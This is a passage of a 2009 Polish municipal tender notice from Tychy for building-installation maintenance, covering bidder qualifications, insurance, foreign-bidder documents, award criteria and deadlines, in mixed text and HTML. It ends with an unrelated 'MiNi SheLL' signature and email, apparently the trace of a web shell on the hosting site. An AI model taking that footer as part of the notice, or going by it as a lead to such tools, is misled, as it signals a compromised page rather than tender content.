     oraz aktualne zaświadczenie wydane przez właściwą Izbę Inżynierów;

  - uprawnienia budowlane instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych oraz     
     aktualne zaświadczenie wydane przez właściwą Izbę Inżynierów;

  -  dokument potwierdzający kwalifikacje uprawniające do wykonywania pracy na stanowisku 
     dozoru ( D) w zakresie konserwacji, remontów dla urządzeń , instalacji i sieci    
     elektroenergetycznych o napięciu nie wyższym niż 1 kV;        
   
  -  dokument potwierdzający kwalifikacje uprawniające do wykonywania pracy na stanowisku 
     eksploatacji w zakresie obsługi, konserwacji, remontów dla urządzeń , instalacji i sieci 
     elektroenergetycznych o napięciu nie wyższym niż 1 kV;   
                                                                                                    
 -  dokument potwierdzający kwalifikacje uprawniające do wykonywania prac kontrolno - 
     pomiarowych z pomiarami ochrony przeciwporażeniowej i instalacji odgromowej;

 -  dokument potwierdzający kwalifikacje uprawniające do wykonywania pracy na stanowisku    
    dozoru nad eksploatacją w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym   
    urządzeń, instalacji gazowych; 

 -  dokument potwierdzający kwalifikacje uprawniające do wykonywania pracy na stanowisku  
    eksploatacji w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym urządzeń, 
    instalacji gazowych; 

    Wykonawca, który wskaże w wykazie osoby, którymi  b ę d z i e dysponował winien złożyć  
    pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
    zamówienia.   
   
     Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ.

     (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  
     łącznie lub co najmniej jeden z Wykonawców).  



1.3.  Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
        zapewniającej wykonanie zamówienia ( art. 22. ust.1 pkt. 3) ustawy -Pzp.) 

a)  aktualna polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
     - o wartości ubezpieczenia nie mniejszej niż  800 000,00 zł.  Kwotę ubezpieczenia 
     wyrażoną w innej walucie niż PLN , Zamawiający przeliczy na PLN, przyjmując do przeliczeń 
     średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.
    (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za 
      spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co 
     najmniej jeden z Wykonawców)   

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1.1. lit. a) i b) - składa 
     dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
          na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
          organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub 
     miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie w pkt. 1.1. 
     lit. a) i b) zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
     notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu 
     zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
     Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Stawka roboczogodzny kosztorysowej - R-g brutto(R x Kp. x Zysk) - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-100 Tychy, ul. Filaretów 31- pokój Nr 20 , cena 15 zł (brutto) lub za 
  zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com